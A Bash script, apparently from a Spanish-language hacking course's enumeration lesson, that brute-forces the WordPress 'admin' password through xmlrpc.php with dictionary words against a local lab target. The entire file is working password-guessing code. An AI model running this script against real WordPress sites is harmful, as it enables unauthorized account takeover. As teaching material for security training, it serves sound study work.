infosec/Introduccion-hacking-hack4u/tema_4_enumeracion/xmlrpc_bruteforce.sh

39 lines
723 B
Bash
Executable File

#!/bin/bash
function ctrl_c() {
echo -e "\n\n[+] Saliendo...\n"
exit 1
}
# Ctrl + C to stop the script
trap ctrl_c SIGINT
function createXML(){
password=$1
xmlFile="""
<?xml version=\"1.0\"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>$password</value></param>
</params>
</methodCall>
"""
echo $xmlFile > file.xml
response=$(curl -s -X POST "http://localhost:31337/xmlrpc.php" -d@file.xml)
if [[ ! "$(echo $response | grep 'Incorrect username or password')" ]]; then
echo -e "\n\n[+] La contraseña para admin es $password\n\n"
exit 0
fi
}
cat /usr/share/dict/words | while read password; do
createXML $password
done